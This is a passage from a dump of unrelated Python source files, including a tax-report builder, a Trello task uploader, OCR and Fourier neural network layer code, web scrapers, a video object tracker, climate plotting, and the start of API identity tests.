records, data):\n pool = Pool()\n Company = pool.get('company.company')\n t_context = Transaction().context\n\n context = super().get_context(records, data)\n\n context['company'] = Company(t_context['company'])\n context['records_amount'] = sum(\n (r.amount for r in records), Decimal(0))\n\n start_date = t_context.get('start_date')\n end_date = t_context.get('end_date')\n if start_date or end_date:\n date = start_date or end_date\n context['year'] = str(date.year)\n if start_date and end_date:\n start_month = start_date.month\n end_month = end_date.month\n if end_month - start_month > 0:\n context['period'] = str(end_month // 3) + 'T'\n context['period_number'] = str(20 + (end_month // 3))\n else:\n context['period'] = str(start_month).rjust(2, '0')\n context['period_number'] = str(start_month).rjust(2, '0')\n\n context['justify'] = justify\n context['format_integer'] = format_integer\n context['format_percentage'] = format_percentage\n context['records_amount'] = sum(\n (r.amount for r in records), Decimal(0))\n\n context['justify'] = justify\n context['identifier_code'] = identifier_code\n\n def format_decimal(n, digits=13):\n if not isinstance(n, Decimal):\n n = Decimal(n)\n return ('{0:.2f}'.format(abs(n))).replace('.', '').rjust(\n digits, '0')\n context['format_decimal'] = format_decimal\n\n return context\n","sub_path":"account_es/reporting_tax.py","file_name":"reporting_tax.py","file_ext":"py","file_size_in_byte":25416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171590851","text":"from trello import TrelloClient\nimport connectSQLite\nimport configuration\nfrom datetime import datetime\n\nimport logging\nlogging.basicConfig(filename='Running.log',level=logging.INFO, format = '%(asctime)s:%(levelname)s:%(message)s')\n\n\nconfig = configuration.load_config_file('polical.yaml')\nclient = TrelloClient(\n api_key=config['api_key'],\n api_secret=config['api_secret'],\n token=config['oauth_token'],\n token_secret=config['oauth_token_secret'],\n)\nmember_id = config['owner_id']\n\n\ndef SendTaskToTrello():\n subjectsBoard = client.get_board(config['board_id'])\n tasks = connectSQLite.getTasks()\n if len(tasks) == 0:\n logging.info(\"No existen tareas nuevas, verifique consultando el calendario\")\n print(\"No existen tareas nuevas, verifique consultando el calendario\")\n else:\n for x in tasks:\n logging.info(\"Agregando Tarea:\" + x.subjectID +\" \"+ x.title + \" \" + x.description + \" \" + x.due_date)\n print(\"Agregando Tarea:\")\n x.print()\n subjectList = subjectsBoard.get_list(x.subjectID)\n card = subjectList.add_card(\n x.title, x.description.replace('\\\\n', '\\n'))\n card.assign(member_id)\n x.due_date = x.due_date[0:10] + \" 07:00:00\"\n card.set_due(datetime.strptime(x.due_date, '%Y-%m-%d %H:%M:%S'))\n # print(x.due_date)\n # card.set_due(x.due_date)\n connectSQLite.addTarTID(x.id, subjectList.list_cards()[-1].id)\n","sub_path":"SendTaskToTrello.py","file_name":"SendTaskToTrello.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640049670","text":"import re\n\nfrom calamari_ocr.proto.calamari_pb2 import LayerParams, NetworkParams\n\n\ndef default_network_params():\n params = NetworkParams()\n\n set_default_network_params(params)\n\n return params\n\n\ndef set_default_network_params(params):\n params.solver = NetworkParams.ADAM_SOLVER\n params.dropout = 0\n params.ctc_merge_repeated = True\n params.backend.cudnn = True\n\n\ndef network_params_from_definition_string(str, params):\n cnn_matcher = re.compile(r\"^([\\d]+)(:([\\d]+)(x([\\d]+))?)?$\")\n db_matcher = re.compile(r\"^([\\d]+):([\\d]+)(:([\\d]+)(x([\\d]+))?)?$\")\n concat_matcher = re.compile(r\"^([\\-\\d]+):([\\-\\d]+)$\")\n pool_matcher = re.compile(r\"^([\\d]+)(x([\\d]+))?(:([\\d]+)x([\\d]+))?$\")\n str_params = str.split(\",\")\n lstm_appeared = False\n set_default_network_params(params)\n for param in str_params:\n label, value = tuple(param.split(\"=\"))\n flags = [\"ctc_merge_repeated\", \"cudnn\"]\n floats = [\"momentum\", \"dropout\"]\n if label in flags:\n setattr(params, label, value.lower() == \"true\")\n elif label == \"ctc\":\n setattr(params, label, NetworkParams.CTCType.Value(value))\n elif label in floats:\n setattr(params, label, float(value))\n elif label == \"solver\":\n params.solver = {\"momentum\": NetworkParams.MOMENTUM_SOLVER,\n \"adam\": NetworkParams.ADAM_SOLVER}[value.lower()]\n elif label == \"lstm\":\n lstm_appeared = True\n layer = params.layers.add()\n layer.type = LayerParams.LSTM\n layer.lstm_direction = LayerParams.BIDIRECTIONAL_LSTM\n layer.hidden_nodes = int(value)\n elif label == 'concat':\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = concat_matcher.match(value)\n if match is None:\n raise Exception(\"Concat structure needs: concat=[index0]:[index1] but got concat={}\".format(value))\n\n match = match.groups()\n layer = params.layers.add()\n layer.type = LayerParams.CONCAT\n layer.concat_indices[:] = list(map(int, match))\n elif label == \"db\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = db_matcher.match(value)\n if match is None:\n raise Exception(\"Dilated block structure needs: db=[filters]:[depth>0]:[h]x[w]\")\n\n match = match.groups()\n kernel_size = [2, 2]\n if match[2] is not None:\n kernel_size = [int(match[3])] * 2\n if match[4] is not None:\n kernel_size = [int(match[3]), int(match[5])]\n\n layer = params.layers.add()\n layer.type = LayerParams.DILATED_BLOCK\n layer.filters = int(match[0])\n layer.dilated_depth = int(match[1])\n layer.kernel_size.x = kernel_size[0]\n layer.kernel_size.y = kernel_size[1]\n layer.stride.x = 1\n layer.stride.y = 1\n elif label == \"cnn\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = cnn_matcher.match(value)\n if match is None:\n raise Exception(\"CNN structure needs: cnn=[filters]:[h]x[w] but got {}\".format(value))\n\n match = match.groups()\n kernel_size = [2, 2]\n if match[1] is not None:\n kernel_size = [int(match[2])] * 2\n if match[3] is not None:\n kernel_size = [int(match[2]), int(match[4])]\n\n layer = params.layers.add()\n layer.type = LayerParams.CONVOLUTIONAL\n layer.filters = int(match[0])\n layer.kernel_size.x = kernel_size[0]\n layer.kernel_size.y = kernel_size[1]\n layer.stride.x = 1\n layer.stride.y = 1\n elif label == \"tcnn\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n\n match = cnn_matcher.match(value)\n if match is None:\n raise Exception(\"Transposed CNN structure needs: tcnn=[filters]:[sx]x[sy]\")\n\n match = match.groups()\n kernel_size = [2, 2]\n stride = [2, 2]\n if match[1] is not None:\n stride = [int(match[2])] * 2\n if match[3] is not None:\n stride = [int(match[2]), int(match[4])]\n\n layer = params.layers.add()\n layer.type = LayerParams.TRANSPOSED_CONVOLUTIONAL\n layer.filters = int(match[0])\n layer.kernel_size.x = kernel_size[0]\n layer.kernel_size.y = kernel_size[1]\n layer.stride.x = stride[0]\n layer.stride.y = stride[1]\n elif label == \"pool\":\n if lstm_appeared:\n raise Exception(\"LSTM layers must be placed proceeding to CNN/Pool\")\n match = pool_matcher.match(value)\n if match is None:\n raise Exception(\"Pool structure needs: pool=[h];[w]\")\n\n match = match.groups()\n kernel_size = [int(match[0])] * 2\n if match[1] is not None:\n kernel_size = [int(match[0]), int(match[2])]\n\n if match[3] is not None:\n stride = [int(match[4]), int(match[5])]\n else:\n stride = kernel_size\n\n layer = params.layers.add()\n layer.type = LayerParams.MAX_POOLING\n layer.kernel_size.x = kernel_size[0]\n layer.kernel_size.y = kernel_size[1]\n layer.stride.x = stride[0]\n layer.stride.y = stride[1]\n else:\n raise Exception(\"Unknown layer with name: {}\".format(label))\n\n return params\n","sub_path":"calamari_ocr/proto/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599686247","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom functools import partial\n\n\ndef compl_mul1d(a, b):\n # (batch, in_channel, x ), (in_channel, out_channel, x) -> (batch, out_channel, x)\n op = partial(torch.einsum, \"bix,iox->box\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ], dim=-1)\n\n\ndef compl_mul2d(a, b):\n # (batch, in_channel, x,y,t ), (in_channel, out_channel, x,y,t) -> (batch, out_channel, x,y,t)\n return torch.einsum(\"bixy,ioxy->boxy\", a, b)\n\n\n################################################################\n# 1d fourier layer\n################################################################\n\n\nclass SpectralConv1d(nn.Module):\n # TODO: update code to pytorch 1.8.1\n def __init__(self, in_channels, out_channels, modes1):\n super(SpectralConv1d, self).__init__()\n\n \"\"\"\n 1D Fourier layer. It does FFT, linear transform, and Inverse FFT. \n \"\"\"\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n # Number of Fourier modes to multiply, at most floor(N/2) + 1\n self.modes1 = modes1\n\n self.scale = (1 / (in_channels*out_channels))\n self.weights1 = nn.Parameter(\n self.scale * torch.rand(in_channels, out_channels, self.modes1, 2))\n\n def forward(self, x):\n batchsize = x.shape[0]\n # Compute Fourier coeffcients up to factor of e^(- something constant)\n x_ft = torch.rfft(x, 1, normalized=True, onesided=True)\n\n # Multiply relevant Fourier modes\n out_ft = torch.zeros(batchsize, self.in_channels,\n x.size(-1)//2 + 1, 2, device=x.device)\n out_ft[:, :, :self.modes1] = compl_mul1d(\n x_ft[:, :, :self.modes1], self.weights1)\n\n # Return to physical space\n x = torch.fft.irfft(out_ft)\n return x\n\n################################################################\n# 2d fourier layer\n################################################################\n\n\nclass SpectralConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, modes1, modes2):\n super(SpectralConv2d, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n # Number of Fourier modes to multiply, at most floor(N/2) + 1\n self.modes1 = modes1\n self.modes2 = modes2\n\n self.scale = (1 / (in_channels * out_channels))\n self.weights1 = nn.Parameter(\n self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, dtype=torch.cfloat))\n self.weights2 = nn.Parameter(\n self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, dtype=torch.cfloat))\n\n def forward(self, x, gridy=None):\n batchsize = x.shape[0]\n size1 = x.shape[-2]\n size2 = x.shape[-1]\n # Compute Fourier coeffcients up to factor of e^(- something constant)\n x_ft = torch.fft.rfftn(x, dim=[2, 3])\n\n if gridy is None:\n # Multiply relevant Fourier modes\n out_ft = torch.zeros(batchsize, self.out_channels, x.size(-2), x.size(-1) // 2 + 1, device=x.device,\n dtype=torch.cfloat)\n out_ft[:, :, :self.modes1, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, :self.modes1, :self.modes2], self.weights1)\n out_ft[:, :, -self.modes1:, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, -self.modes1:, :self.modes2], self.weights2)\n\n # Return to physical space\n x = torch.fft.irfftn(out_ft, s=(x.size(-2), x.size(-1)), dim=[2, 3])\n else:\n factor1 = compl_mul2d(x_ft[:, :, :self.modes1, :self.modes2], self.weights1)\n factor2 = compl_mul2d(x_ft[:, :, -self.modes1:, :self.modes2], self.weights2)\n x = self.ifft2d(gridy, factor1, factor2, self.modes1, self.modes2) / (size1 * size2)\n return x\n\n def ifft2d(self, gridy, coeff1, coeff2, k1, k2):\n\n # y (batch, N, 2) locations in [0,1]*[0,1]\n # coeff (batch, channels, kmax, kmax)\n\n batchsize = gridy.shape[0]\n N = gridy.shape[1]\n device = gridy.device\n m1 = 2 * k1\n m2 = 2 * k2 - 1\n\n # wavenumber (m1, m2)\n k_x1 = torch.cat((torch.arange(start=0, end=k1, step=1), \\\n torch.arange(start=-(k1), end=0, step=1)), 0).reshape(m1,1).repeat(1,m2).to(device)\n k_x2 = torch.cat((torch.arange(start=0, end=k2, step=1), \\\n torch.arange(start=-(k2-1), end=0, step=1)), 0).reshape(1,m2).repeat(m1,1).to(device)\n\n # K = , (batch, N, m1, m2)\n K1 = torch.outer(gridy[:,:,0].view(-1), k_x1.view(-1)).reshape(batchsize, N, m1, m2)\n K2 = torch.outer(gridy[:,:,1].view(-1), k_x2.view(-1)).reshape(batchsize, N, m1, m2)\n K = K1 + K2\n\n # basis (N, m1, m2)\n basis = torch.exp( 1j * 2* np.pi * K).to(device)\n\n # coeff (batch, channels, m1, m2)\n coeff3 = coeff1[:,:,1:,1:].flip(-1, -2).conj()\n coeff4 = torch.cat([coeff1[:,:,0:1,1:].flip(-1).conj(), coeff2[:,:,:,1:].flip(-1, -2).conj()], dim=-2)\n coeff12 = torch.cat([coeff1, coeff2], dim=-2)\n coeff43 = torch.cat([coeff4, coeff3], dim=-2)\n coeff = torch.cat([coeff12, coeff43], dim=-1)\n\n # Y (batch, channels, N)\n Y = torch.einsum(\"bcxy,bnxy->bcn\", coeff, basis)\n Y = Y.real\n return Y","sub_path":"models/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158320318","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nbase_url = 'https://3d-galleru.ru/'\nstart_url = 'https://3d-galleru.ru/archive/cat/kalendar-42/page-1/'\n\nr = requests.get(start_url)\n\nsoup = BeautifulSoup(r.text, 'html.parser')\n\n\ndef page_count(b_soup):\n \"\"\"\n Определяет количество страниц с информацией\n :param b_soup: объект BeautifulSoup\n :return: Количество страниц в формате int\n \"\"\"\n pages = b_soup.find('div', {'id': 'pages'})\n if pages.text == '':\n last_page_find = 1\n else:\n all_pages = str(pages.text)\n if '123456...' in all_pages:\n last_page_find = all_pages[10:]\n else:\n last_page_find = all_pages[-1]\n return int(last_page_find)\n\n\nlast_page = page_count(soup)\ndates = []\ntitles = []\ncards_urls = []\n\n\nfor page_num in range(1, last_page+1):\n \"\"\"\n Проходится по всем страницам с текущими открытками, собирает: \n даты в dates,\n названия праздников в titles,\n ссылки на открытки в card_urls\n \"\"\"\n url = f'https://3d-galleru.ru/archive/cat/kalendar-42/page-{page_num}'\n r1 = requests.get(url)\n soup = BeautifulSoup(r1.text, 'html.parser')\n\n card_dates = soup.find_all('p', {'class': 'name'})\n for card_date in enumerate(card_dates):\n if card_date[0] % 2:\n dates.append(card_date[1].text.replace('\\ue818', ''))\n\n titles_list = soup.find_all('strong')\n for title in titles_list:\n titles.append(title.text)\n\n products = soup.find_all('a', {'class': 'card-image'})\n for product in products:\n url = product.get('href')\n cards_urls.append(url)\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252990353","text":"import cv2\nimport dlib\nimport os\nfrom matplotlib.pyplot import imshow\nimport scipy.io\nimport scipy.misc\nimport numpy as np\nfrom PIL import Image\nimport time\nfrom keras import backend as K\nfrom keras.models import load_model\nimport cvlib as cv\nimport threading\nfrom cvlib.object_detection import draw_bbox\nfrom ctypes import *\nimport glob\nimport math\nimport random\nfrom yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes\nfrom yad2k.models.keras_yolo import yolo_head, yolo_eval\n\ntrackingQuality_threshold = 8\nn_frames_to_detect = 45\nmin_confidence = 0.75\n\ninput_movie = cv2.VideoCapture(\"data/test_videos/hamilton_clip.mp4\")\n\nif not input_movie.isOpened():\n print(\"Could not open video file\")\n exit()\n\nlength = int(input_movie.get(cv2.CAP_PROP_FRAME_COUNT))\n\nframe_width = int(input_movie.get(3))\nframe_height = int(input_movie.get(4))\nOUTPUT_SIZE_WIDTH = frame_width\nOUTPUT_SIZE_HEIGHT = frame_height\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\noutput_movie = cv2.VideoWriter('data/track_video/Yolo_keras_object.avi', fourcc, 29.97, (frame_width, frame_height))\n\nwidth = np.array(frame_width, dtype=float)\nheight = np.array(frame_height, dtype=float)\nimage_shape = (height, width)\nclass_names = read_classes(\"model_data/coco_classes.txt\")\nanchors = read_anchors(\"model_data/yolo_anchors.txt\")\nyolo_model = load_model(\"model_data/yolov2.h5\")\n\nyolo_model.summary()\nyolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))\nboxes, scores, classes = yolo_eval(yolo_outputs, image_shape)\nsess = K.get_session()\n\ndef detectAndTrackMultipleFaces():\n\n frame_number = 0\n currentFaceID = 0\n\n cv2.namedWindow(\"base-image\", cv2.WINDOW_AUTOSIZE)\n cv2.namedWindow(\"result-image\", cv2.WINDOW_AUTOSIZE)\n cv2.startWindowThread()\n\n rectangleColor = (0,0,255)\n faceTrackers = {}\n model_image_size = (608, 608)\n start=time.time()\n try:\n while True:\n \n rc, fullSizeBaseImage = input_movie.read()\n if not rc:\n print(\"Could not read frame\")\n break\n\n #baseImage = fullSizeBaseImage\n baseImage = cv2.resize( fullSizeBaseImage, ( 608, 608))\n resultImage = baseImage.copy()\n frame_number += 1\n\n pressedKey = cv2.waitKey(2)\n if pressedKey == ord('Q'):\n break\n\n fidsToDelete = []\n for fid in faceTrackers.keys():\n trackingQuality = faceTrackers[ fid ].update( baseImage )\n\n #If the tracking quality is good enough, we must delete\n #this tracker\n if trackingQuality < trackingQuality_threshold:\n fidsToDelete.append( fid )\n\n for fid in fidsToDelete:\n print(\"Removing fid \" + str(fid) + \" from list of trackers\")\n faceTrackers.pop( fid , None )\n\n if (frame_number % n_frames_to_detect) == 0:\n\n #resized_image = baseImage.resize((608, 608), Image.BICUBIC)\n baseImage_data = np.array(baseImage, dtype='float32')\n baseImage_data /= 255.\n baseImage_data = np.expand_dims(baseImage_data, 0) # Add batch dimension.\n\n\n\n#baseImage, baseImage_data = preprocess_image(baseImage, model_image_size = (608, 608))\n out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes],feed_dict={yolo_model.input:baseImage_data,K.learning_phase(): 0})\n\n for i,c in reversed(list(enumerate(out_classes))):\n top, left, bottom, right = out_boxes[i]\n\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(608, np.floor(bottom + 0.5).astype('int32'))\n right = min(608, np.floor(right + 0.5).astype('int32'))\n\n x = left\n y = bottom\n w = right-left\n h = bottom-top\n x_bar = x + 0.5 * w\n y_bar = y + 0.5 * h\n\n matchedFid = None\n\n for fid in faceTrackers.keys():\n tracked_position = faceTrackers[fid].get_position()\n\n t_x = int(tracked_position.left())\n t_y = int(tracked_position.top())\n t_w = int(tracked_position.width())\n t_h = int(tracked_position.height())\n t_x_bar = t_x + 0.5 * t_w\n t_y_bar = t_y + 0.5 * t_h\n\n if ( ( t_x <= x_bar <= (t_x + t_w)) and \n ( t_y <= y_bar <= (t_y + t_h)) and \n ( x <= t_x_bar <= (x + w )) and \n ( y <= t_y_bar <= (y + h ))):\n matchedFid = fid\n\n if ((matchedFid is None) and (out_scores[i] > min_confidence)):\n\n print(\"Creating new tracker \" + str(currentFaceID))\n\n tracker = dlib.correlation_tracker()\n tracker.start_track(baseImage,dlib.rectangle( x-10,y-20,x+w+10,y+h+20))\n\n faceTrackers[ currentFaceID ] = tracker\n currentFaceID += 1\n\n for fid in faceTrackers.keys():\n tracked_position = faceTrackers[fid].get_position()\n\n t_x = int(tracked_position.left())\n t_y = int(tracked_position.top())\n t_w = int(tracked_position.width())\n t_h = int(tracked_position.height())\n\n cv2.rectangle(resultImage, (t_x, t_y),(t_x + t_w , t_y + t_h), rectangleColor ,2)\n\n cv2.imshow(\"base-image\", baseImage)\n cv2.imshow(\"result-image\", resultImage)\n output_movie.write(resultImage)\n\n except KeyboardInterrupt as e:\n pass\n end=time.time()-start\n print(\"tiempo: {}\".format(end))\n cv2.destroyAllWindows()\n exit(0)\n\nif __name__ == '__main__':\n detectAndTrackMultipleFaces()\n","sub_path":"computer_vision/track_object_video_3.py","file_name":"track_object_video_3.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"180826287","text":"import pickle, sys\n\nfrom snorkel.snorkel.matchers import *\n#from databases import *\n#sys.path.append('/Users/cameronbaab/Documents/Marker-Reader4')\n\n\ndef getBiomarkerTypeMatcher():\n\n with open('databases/typesDatabase.pickle', 'rb') as f:\n typeDatabase = pickle.load(f)\n typeMatcher = DictionaryMatch(d = typeDatabase, ignore_case = True)\n\n return typeMatcher\n \"\"\"\n max_name = None\n max_count = 0\n count = 0\n #print type(entities)\n while(count < len(entities)):\n numInstances = 0\n counter = count\n while(counter < len(entities) - 1):\n if(entities[counter].mention(attribute=\"words\") == entities[counter + 1].mention(attribute=\"words\")):\n numInstances += 1\n counter += 1\n if(numInstances >= max_count):\n max_name = entities[count]\n max_count = numInstances\n count += 1\n return max_name.mention(attribute='words')\n \"\"\"\n","sub_path":"BiomarkerTypeMatcher.py","file_name":"BiomarkerTypeMatcher.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"517152970","text":"import seisnn\n\ndatabase = 'Hualien.db'\ndb = seisnn.sql.Client(database)\n\ntfr_list = db.get_matched_list('*', 'tfrecord', 'path')\n\nmodel_instance = 'test_model'\ntrainer = seisnn.model.trainer.GeneratorTrainer(database)\ntrainer.train_loop(tfr_list, model_instance,\n batch_size=64, epochs=10,\n plot=True)\n","sub_path":"scripts/05_training.py","file_name":"05_training.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597911019","text":"''' \n16/08/2018 Plot hm of local walker circulation\n'''\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams\nimport sh\nfrom hadley_cell import walker_cell\nfrom data_handling_updates import model_constants as mc\nfrom windspharm.xarray import VectorWind\n\n\ndef walker_hm(regions=[[0,10], [10,20], [20,30], [30,40]]):\n \n data = xr.open_dataset('/scratch/rg419/obs_and_reanalysis/era_v_clim_alllevs.nc' )\n data_u = xr.open_dataset('/scratch/rg419/obs_and_reanalysis/era_u_clim_alllevs.nc' )\n \n # Take pentad means\n data.coords['pentad'] = data.day_of_yr //5 + 1. \n data = data.groupby('pentad').mean(('day_of_yr'))\n data_u.coords['pentad'] = data_u.day_of_yr //5 + 1. \n data_u = data_u.groupby('pentad').mean(('day_of_yr'))\n \n plot_dir = '/scratch/rg419/plots/overturning_monthly/'\n mkdir = sh.mkdir.bake('-p')\n mkdir(plot_dir)\n \n # Create a VectorWind instance to handle the computation\n w = VectorWind(data_u.u.sel(pfull=np.arange(50.,950.,50.)), data.v.sel(pfull=np.arange(50.,950.,50.)))\n # Compute variables\n streamfun, vel_pot = w.sfvp()\n uchi, vchi, upsi, vpsi = w.helmholtz()\n \n # Set figure parameters\n rcParams['figure.figsize'] = 10, 7\n rcParams['font.size'] = 14\n # Start figure with 4 subplots\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='col', sharey='row')\n axes = [ax1,ax2,ax3,ax4]\n \n i=0\n for ax in axes:\n psi_w = walker_cell(uchi, latin=regions[i], dp_in=-50.)\n psi_w /= 1.e9\n i=i+1\n f1=psi_w.sel(pfull=500).plot.contourf(ax=ax, x='lon', y='pentad', add_labels=False, add_colorbar=False, levels=np.arange(-300.,301.,50.), extend='both')\n \n ax1.set_title('0-10 N')\n ax2.set_title('10-20 N')\n ax3.set_title('20-30 N')\n ax4.set_title('30-40 N')\n \n for ax in [ax1,ax2,ax3,ax4]:\n ax.grid(True,linestyle=':')\n ax.set_yticks(np.arange(0.,73., 18.))\n ax.set_xticks([0.,90.,180.,270.,360.])\n \n ax3.set_xlabel('Longitude')\n ax4.set_xlabel('Longitude')\n ax1.set_ylabel('Pentad')\n ax3.set_ylabel('Pentad')\n \n plt.subplots_adjust(left=0.1, right=0.97, top=0.95, bottom=0.1, hspace=0.3, wspace=0.3)\n \n cb1=fig.colorbar(f1, ax=axes, use_gridspec=True, orientation = 'horizontal',fraction=0.05, pad=0.1, aspect=30, shrink=0.5)\n cb1.set_label('Zonal overturning streamfunction')\n \n # Save as a pdf\n plt.savefig(plot_dir + 'walker_cell_hm_era.pdf', format='pdf')\n plt.close()\n \n data.close()\n\nwalker_hm()\n\n","sub_path":"zonal_asym_runs/walker_cell_hm_era.py","file_name":"walker_cell_hm_era.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"31119728","text":"\n#resizable window class\nimport curses\nimport math\n\n\nclass window_resizable:\n\tdef __init__(self,screen,position_y,position_x):\n\t\tself.initialscreensize = screen.getmaxyx()\n\t\tself.position_y = position_y\n\t\tself.position_x = position_x\n\t\t#percentage of screen\n\t\tself.scale = .8\n\t\tself.win = curses.newwin(int(math.ceil(self.initialscreensize[0]*self.scale)),int(math.ceil(self.initialscreensize[1]*self.scale)),0,0)\n\t\tself.win.border(0)\n\t\tself.win.refresh()\n\n\tdef update(self):\n\t\tself.win.erase()\n\t\tif self.initialscreensize != screen.getmaxyx():\n\t\t\tself.win.refresh()\n\t\t\tself.initialscreensize = screen.getmaxyx()\n\t\tself.win.resize(int(math.ceil(self.initialscreensize[0]*self.scale)),int(math.ceil(self.initialscreensize[1]*self.scale)))\n\t\tself.win.border(0)\n\t\tself.win.refresh()\n\n\n#initial test\n\nscreen = curses.initscr()\ncurses.noecho()\n\nscreen.nodelay(1)#important to block some crap\\\nscreen.refresh()\n\nmy_win = window_resizable(screen,0,0)\nwhile True:\n\tmy_win.win.addstr(1,1,str(my_win.win.getmaxyx()))\n\tmy_win.update()\n\t\n","sub_path":"curses-test/resizableclass.py","file_name":"resizableclass.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"139614130","text":"import requests \nfrom bs4 import BeautifulSoup\n\nURL = input('Cole a url Kabum: ')\nprecoRequirido = float(input(\"Preço esperado: \"))\n\nheaders = {}\n#headerAux = input(\"Paste de hader: \")\n\nheaders = ({\"User-Agent\": 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'})\n\npagina = requests.get(URL, headers = headers)\nsoup = BeautifulSoup(pagina.content, 'html.parser')\n\ndef getDados():\n\ttitulo = soup.find(id = \"titulo_det\").get_text()\n\n\tfor span in soup.find('div', class_='preco_desconto-cm').findAll('strong'):\n\t\tpreco = span.text\n\n\taux = \"\"\n\ttamanhoPreco = 0\t\n\tfor i in preco:\n\t\tif tamanhoPreco > 2:\n\t\t\taux += str(i);\n\t\ttamanhoPreco += 1;\n\n\taux = aux.replace(\".\", \"\")\n\taux = aux.replace(\",\", \".\")\n\n\tpreco = float(aux)\n\n\ttitulo = titulo.strip()\n\n\treturn preco, titulo\n\ndef analisaPreco(preco, precoRequirido):\n\tif preco < precoRequirido:\n\t\treturn True\n\t\n\treturn False\n\npreco, titulo = getDados()\n\nif analisaPreco(preco, precoRequirido):\n\tprint(\"\\nProduto:\", titulo, \"esta disponivel por: R$\", preco)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470896996","text":"#!/usr/bin/env python\nfrom base64 import b64encode\nfrom json import dumps\nfrom unittest import main\nfrom unittest import TestCase\nfrom unittest.mock import Mock\nfrom unittest.mock import patch\n\nfrom api import api_operation\nfrom api.host import _order_how\nfrom api.host import _params_to_order_by\nfrom app.auth.identity import from_auth_header\nfrom app.auth.identity import from_bearer_token\nfrom app.auth.identity import Identity\nfrom app.auth.identity import SHARED_SECRET_ENV_VAR\nfrom app.auth.identity import validate\nfrom app.config import Config\nfrom test_utils import set_environment\n\n\nclass ApiOperationTestCase(TestCase):\n \"\"\"\n Test the API operation decorator that increments the request counter with every\n call.\n \"\"\"\n\n @patch(\"api.api_request_count.inc\")\n def test_counter_is_incremented(self, inc):\n @api_operation\n def func():\n pass\n\n func()\n inc.assert_called_once_with()\n\n def test_arguments_are_passed(self):\n old_func = Mock()\n old_func.__name__ = \"old_func\"\n new_func = api_operation(old_func)\n\n args = (Mock(),)\n kwargs = {\"some_arg\": Mock()}\n\n new_func(*args, **kwargs)\n old_func.assert_called_once_with(*args, **kwargs)\n\n def test_return_value_is_passed(self):\n old_func = Mock()\n old_func.__name__ = \"old_func\"\n new_func = api_operation(old_func)\n self.assertEqual(old_func.return_value, new_func())\n\n\nclass AuthIdentityConstructorTestCase(TestCase):\n \"\"\"\n Tests the Identity module constructors.\n \"\"\"\n\n @staticmethod\n def _identity():\n return Identity(account_number=\"some number\")\n\n\nclass AuthIdentityFromAuthHeaderTestCase(AuthIdentityConstructorTestCase):\n \"\"\"\n Tests creating an Identity from a Base64 encoded JSON string, which is what is in\n the HTTP header.\n \"\"\"\n\n def test_valid(self):\n \"\"\"\n Initialize the Identity object with an encoded payload – a base64-encoded JSON.\n That would typically be a raw HTTP header content.\n \"\"\"\n expected_identity = self._identity()\n\n identity_data = expected_identity._asdict()\n\n identity_data_dicts = [\n identity_data,\n # Test with extra data in the identity dict\n {**identity_data, **{\"extra_data\": \"value\"}},\n ]\n\n for identity_data in identity_data_dicts:\n with self.subTest(identity_data=identity_data):\n identity = {\"identity\": identity_data}\n json = dumps(identity)\n base64 = b64encode(json.encode())\n\n try:\n actual_identity = from_auth_header(base64)\n self.assertEqual(expected_identity, actual_identity)\n except (TypeError, ValueError):\n self.fail()\n\n self.assertEqual(actual_identity.is_trusted_system, False)\n\n def test_invalid_type(self):\n \"\"\"\n Initializing the Identity object with an invalid type that can’t be a Base64\n encoded payload 